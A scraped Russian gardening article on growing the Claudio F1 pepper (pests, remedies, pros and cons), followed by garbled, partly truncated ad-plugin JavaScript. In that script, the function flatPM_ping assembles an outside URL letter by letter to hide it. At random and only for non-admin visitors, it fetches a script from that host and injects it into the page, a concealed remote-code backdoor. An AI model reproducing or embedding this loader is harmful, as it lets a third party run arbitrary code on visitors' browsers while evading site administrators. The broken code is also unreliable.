К одному из самых опасных вирусов – табачной мозаике – у Клаудио F1 отличная сопротивляемость. Но в случае поражения растение обрабатывают «Хризомалом». Против вирусного столбура проводят опрыскивание обезжиренным молоком или сывороткой. С ещё одним заболеванием этого вида – пятнистым увяданием – поможет справиться «Фундазол».

Перец Клаудио может заинтересовать и некоторых вредителей:

  • Тля. С ней отлично справляется древесная зола или табачная пыль. Неплохо зарекомендовало себя и опрыскивание настоявшимися полынью или пижмой.
  • Паутинный клещ. Лучшей обороной станут настои одуванчиков, луковой или чесночной шелухи.
  • Проволочники. Падки на сладкие корнеплоды, которые станут замечательной приманкой.
  • Слизни. В борьбе помогут молотый горький перец и горчичный порошок. Отлично действуют и зарытые в землю баночки с пивом.
  • Колорадский жук и медведка. Оптимальный вариант – уничтожение самих насекомых. Можно использовать промышленные препараты, учитывая время распада ядов для избежания отравлений плодами.
  • Белокрылка. Этих насекомых смывают водой, а после сбора урожая растения сжигают. В качестве временной помощи допустимо использовать пивные ловушки.

Достоинства и недостатки

К несомненным достоинствам Клаудио F1 относят:

  • высокие сборы плодов;
  • прекрасные вкусовые характеристики;
  • высокую транспортабельность;
  • универсальность условий выращивания;
  • широкое применение урожая;
  • устойчивость к погодным перепадам и болезням;
  • размеры перца и привлекательный товарный вид.

Основными недостатками можно назвать:

  • низкие сроки хранения вызревших красных плодов;
  • частое поражение вредителями;
  • длительный период дозревания от технического до биологического;
  • чувствительность к повышенной влажности.

Обзор сорта Клаудио F1, а также секреты выращивания можно узнать из следующего видео:

Отзывы

Некоторых может отпугнуть склонность Клаудио F1 подвергаться напастям вредителей, но если вы будете в ответе за то, что посадили – непревзойденный вкус урожая с лихвой компенсирует все затраты.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
×
×